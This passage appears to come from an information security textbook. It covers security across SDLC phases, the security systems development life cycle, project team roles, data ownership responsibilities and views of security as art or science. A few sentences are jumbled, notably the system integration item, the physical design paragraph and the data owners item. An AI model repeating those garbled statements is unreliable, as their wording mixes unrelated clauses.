and evaluation results, system interconnection agreements, security authorizations/
accreditation).
6. Security control development entails designing, developing, and implementing the security
controls outlined in the respective security plans. For presently operational information
systems, security plans may call for the establishment of additional security controls to
enhance the controls already in place or the modification of chosen measures that are
deemed ineffective.

7. Developmental security test and evaluation. Security measures designed for a new
information system are tested and evaluated during development to ensure that they are
performing properly and effectively. Some security controls (mostly non-technical controls)
cannot be verified and evaluated until the information system is operational; these controls
are mainly management and operational controls.
9. Other planning components-ensures that when implementing security into the life cycle, all
necessary components of the development process are taken into account. Selection of the
proper contract type, participation of all relevant functional groups within an organization,
participation of the certifier and accreditor, and development and implementation of necessary
contracting strategies and processes are some of these components.
Implementation Phase

1. Inspection and acceptance guarantee that the organization validates and verifies that the
deliverables include the functionality described in the specification.

2. System integration guarantees that the information system is integrated at the security
implementation recommendations are followed for enabling security control operational site
where it will be deployed for use. Vendor instructions and available settings and switches.

3. Security certification guarantees that controls are effectively applied through

established verification methodologies and procedures, giving organization authorities
confidence that adequate safeguards and countermeasures are in place to protect the
organization's information system. Security certification also identifies and defines the
information system's known weaknesses.

4. Security accreditation- provides an information system with the essential security

authorization to process, store, or transmit information. This permission is provided by a
senior organization official and is based on the verification of security controls' efficacy to a
certain level of assurance and the identification of a residual risk to agency assets or
operations.
Maintenance and Change Phase

1. Configuration management and control guarantees that the potential security implications
of specific changes to an information system or its surrounding environment are adequately
considered. Configuration management and configuration control methods are essential for
establishing an initial baseline of hardware, software, and firmware components for the
information system, as well as regulating and keeping an accurate inventory of any system
changes.

2. Continuous monitoring- ensures that controls remain successful in their application by

testing and evaluating them on a regular basis. A comprehensive information security
program must include security control monitoring (i.e., confirming the continuous
effectiveness of such controls over time) and reporting the security status of the information
system to appropriate agency personnel.

3. Information preservation guarantees that data are kept for as long as it is needed to comply
with present legal obligations and to accommodate future technological advances that may
make the retrieval technique outdated.
Data are removed, wiped, and written over as needed during media sanitization.

4. Disposal of hardware and software- assures that hardware and software are disposed of
according to the information system security officer's instructions.

"Adapted from Information System Development Life Cycle Security Considerations"

Information security must be built into a system from the beginning, rather than being added
during or after the implementation phase. Security features are often introduced as an
afterthought to information systems that were intended without them. This necessitates
ongoing patching, upgrading, and maintenance to keep the systems and data safe. With the
adage "an ounce of prevention is worth a pound of cure" in mind, businesses are shifting to
more security-focused development methodologies, hoping to boost not only the performance
of their existing systems, but also consumer confidence in their products. Microsoft basically
halted development on many of its products in early 2002 while putting its OS developers,
testers, and program managers through a rigorous program focusing on secure software
development. It also postponed the release of its flagship server operating system in order to
address security concerns. Many more companies are following Microsoft's lead in
incorporating security into the development process.
The Security Systems Development Life Cycle

The typical SDLC phases can be altered to help with the implementation of an information
security project. While the objective and exact operations of the two processes may alter, the
underlying methodology remains the same. Implementing information security entails
recognizing specific dangers and putting in place precise procedures to counter them. This
process is unified by the SecSDLC, which turns it into a coherent program rather than a
sequence of seemingly unrelated actions. (Other firms develop information security systems
using a risk management approach.)
INVESTIGATION. The SecSDLC's research phase begins with a directive from senior
management that specifies the project's methodology, outputs, and goals, as well as its budget
and other constraints. Typically, this phase starts with an enterprise information security policy
(EISP), which describes how a security program will be implemented within the company. The
scope of the project, as well as specific goals and objectives and any additional constraints not
covered by the program policy, are defined. Teams of responsible managers, employees, and
contractors are organized; problems are analyzed; and the scope of the project, as well as
specific goals and objectives and any additional constraints not covered by the program policy,
are defined. Finally, an organizational feasibility analysis is carried out to see if the business has
the resources and commitment required to complete a successful security analysis and design.
ANALYSIS. The documents from the investigation phase are examined in the analysis step. A
preliminary study of existing security policies or programs, as well as documented current
threats and associated controls, is conducted by the development team. This phase also
includes a review of any applicable legal problems that may have an impact on the security
solution's design.
Privacy rules are increasingly being taken into account when making judgments about
information systems that handle personal data. Many states have recently enacted legislation
prohibiting certain computer-related activities. It is critical to have a thorough awareness of
these concerns. In this stage, risk management also begins. Risk management is the process of
recognizing, assessing, and evaluating the organization's levels of risk, particularly threats to
the organization's security and the information it stores and processes.
LOGICAL DESIGN. The logical design phase produces and develops information security
blueprints, as well as analyses and implements essential policies that have an impact on later
decisions. The team also plans incident response actions in the case of a partial or catastrophic
loss at this point. The following questions are addressed by the planning:

1. Continuity planning: How will your business continue if you suffer a setback?
2. Incident Response. When an attack occurs, what measures are taken to respond?
3. Disaster Recovery. What should be done as soon as possible following a disaster to
restore information and essential systems?
The next step is to conduct a feasibility analysis to decide whether the project should be
continued or outsourced.
PHYSICAL DESIGN. The physical design step assesses the information security technologies
required to support the logical design blueprint, creates alternative alternatives, and selects a
final design. When the physical design is finished, the information security blueprint may be
revised to keep it in line with the changes that are required. During this step, criteria for
defining the definition of successful solutions are also developed. The ideas this time. The
feasibility study assesses the organization's readiness for the proposed project for physical
security measures to support the suggested technology solutions are included at the end of this
phase, and the design is then submitted to the champion and sponsors, Before the project is
implemented, all parties involved have the opportunity to approve it.
IMPLEMENTATION. SecSDLC's implementation phase is likewise similar to that of standard
SDLC. Security solutions are purchased (created or purchased), tested, implemented, and then
tested again. Personnel issues are assessed, and training and education programs are
implemented. Finally, senior management is presented with the full tested package for final
clearance.
MAINTENANCE AND CHANGE. Given the present ever-changing threat environment,
maintenance and change is the final, but maybe most critical, phase. Information security
systems must be constantly monitored, tested, modified, updated, and repaired in today's
world. Traditional SDLC-based application systems are not built to anticipate a software attack
that necessitates some level of application reconstruction. The fight for solid, reliable systems
in information security is a defensive one. Repairing damage and restoring data is frequently a
never-ending battle against an unseen foe. To prevent attacks from successfully infiltrating
sensitive data, an organization's information security profile must constantly adjust as new
threats emerge and old threats evolve. This constant vigilance and security can be compared
to that of a castle, where threats from the outside as well as the inside must be constantly
watched and verified using new and more sophisticated technologies.
Security Professionals and the Organization

SENIOR MANAGEMENT. The steps in both the systems development life cycle and the security
systems development life cycle are summarized in Table 1-2. The steps in the security systems
development life cycle are comparable to those in the systems development life cycle, hence
those common to both cycles are listed in column 2. Column 3 lists the steps performed in each
phase of the security systems development life cycle that are specific to that phase.
The chief information security officer (CISO) is in charge of the organization's information
security evaluation, management, and implementation. The CISO is also known as the IT
security manager, the security administrator, or a similar title. Although the CISO normally
reports directly to the CIO, it is not uncommon for one or more layers of administration to exist
between the two in bigger firms. The CISO's suggestions to the CIO, on the other hand, must be
accorded equal priority, if not more, than other technology and information-related ideas. The
placement of the CISO and supporting security personnel in organizational hierarchies is a hot
topic in the security sector right now.

Information Security Project Team

The information security project team should include a diverse group of people with expertise
in one or more of the required technical and non- technical domains. Designing security
necessitates many of the same skills as managing and implementing it. The following roles are
filled by members of the security project team:

1. Champion: A project's champion is a top executive who promotes the project and
secures its financial and administrative support at the highest levels of the company.

2. Team leader: A project manager who knows project management, personnel management,
and information security technical needs, such as a departmental line manager or staff unit
manager.

3. Security policy developers: People who understand the corporate culture, current rules, and
needs for establishing and implementing successful policies are security policy developers.

4. Risk assessment specialists: People who understand financial risk assessment

methodologies, the worth of organizational assets, and the security methods to be
applied are known as risk assessment specialists.

5. Security professionals are committed, well-trained, and well-educated experts in all

elements of information security, both technical and nontechnical.

6. Systems administrators: People who have primary responsibility for administering

the systems that house the organization's information.

7. End users: Those who will be most affected by the new system. A team of users from
various departments, levels, and degrees of technical knowledge should ideally support the
team in focusing on the deployment of realistic controls in ways that do not interrupt the
critical business activities they are trying to protect.

Data Responsibilities

The following are the three categories of data ownership and their associated responsibilities:
1. Data owners are those who are in charge of the protection and usage of a certain piece of
data. They are typically CIOS or members of senior management. The level of data
organizational change are normally determined by the data owners. The data owners
collaborate with subordinate managers to manage the data on a day-to-day basis.

2. Data custodians: Working directly with data owners, data custodians are in charge of the
information's storage, maintenance, and security. This may be a specific job, such as the CISO,
or it may be an additional role of a systems administrator or other technology management,
depending on the scale of the firm. Overseeing data storage and backups, applying the precise
procedures and rules spelled forth in the security policies and plans, and reporting to the data
owner are all common responsibilities of a data custodian.

3. Data users: End users who work with data to accomplish their assigned duties in support of
the organization's mission are known as data users. Data users are included here as individuals
having an information security responsibility because everyone in the organization is
accountable for data security.

Communities of Interest

Each company creates and maintains its own culture and values. There are communities of
interest that arise and evolve within each organizational culture. A community of interest, as
described above, is a group of persons within an organization who are joined by similar interests
or beliefs and who have a common purpose of assisting the organization in meeting its
objectives. While an organization may have many different communities of interest, this book
identifies the three most common, each of which has duties and responsibilities in information
security. In theory, each position should complement the others; however, this is rarely the case
in practice.

Information Security Management and Professionals

The goals and mission of the information security community of interest are aligned with the
roles of information security professionals. These job functions and organizational roles are
concerned with the security of the organization's information systems and stored data.

Information Technology Management and Professionals

IT managers and skilled professionals in systems design, programming, networks, and other
related fields constitute a community of interest with many of the same goals as the
information security community. However, its members are more concerned with the costs of
system development and operation, as well as the convenience of use for system users, the
timeliness of system development, and transaction response time. The aims of the IT
community and the goals of the information security community are not always in sync, and
this can lead to conflict depending on the organizational structure.
Organizational Management and Professionals

The other primary community of interest is made up of the organization's general management
staff and the rest of the resources. Executive management, production management, human
resources, accounting, and legal, to name a few subsets of this huge group, are virtually always
made up of subsets of other interests as well. These groups are frequently classified as
consumers of information technology systems by the IT community, whereas they are classified
as security subjects by the information security community. In fact, this community serves as
the best reminder that all IT systems and information security goals exist to help the larger
business community achieve its goals.

Is information Security a Science or an Art?

Given the complexity of today's information systems, information security implementation is

sometimes described as a blend of art and science.
System technologists, particularly those with a talent for managing and controlling computers
and computer- based systems, have long been suspected of employing a little magic to keep
the systems running and functioning as they should. Security artisans are a term used to
describe these types of technicians in the field of information security.

Security as Art

The administrators and professionals in charge of security can be compared to a painter

working with oils on canvas. A smidgeon of color here, a brush stroke there, just enough to
express the image the artist wishes to convey without overpowering the spectator or
restricting user access excessively in terms of security. There are few universally approved full
solutions, and there are no hard and fast rules governing the installation of various security
devices. While there are numerous manuals to support individual systems, there is none for
deploying security across a whole network. This is especially true given the high amount of
interaction between users, policies, and technological controls.

Security as Science

Information security is both a science and an art thanks to technology developed by computer
scientists and engineers and engineered for high performance levels. Almost all activities in
computer systems are caused by certain conditions, according to the majority of scientists.
Almost every flaw, security flaw, and system failure is the consequence of unique hardware and
software interacting. These flaws may be resolved and eliminated if the developers had
enough time.
The remaining flaws are usually the result of technology failing for one of a thousand different
causes. There are numerous recognized and certified security approaches and procedures
available, as well as competent technical security advice. Best practices, due care standards,
and other tried- and-true procedures can reduce the amount of guesswork involved in securing
an organization's data and systems.
Security as a Social Science

Information security as a social science, which combines elements of art, and science and
provides a new dimension to the issue, is a third viewpoint to explore. Individuals' behavior as
they interact with systems, whether societal systems or, in this case, information systems, is
studied in social science. Those inside the business and people who interact with the system,
whether purposefully or unintentionally, are at the heart of information security. End users
who require the data that security personnel are attempting to protect could be the weakest
link in the security chain.

Security managers can considerably lower the levels of risk produced by end users and establish
more acceptable and supportable security profiles by knowing some of the behavioral aspects
of organizational science and change management. These methods, when combined with
proper policy and training, can significantly improve end-user performance and result in a more
secure information system.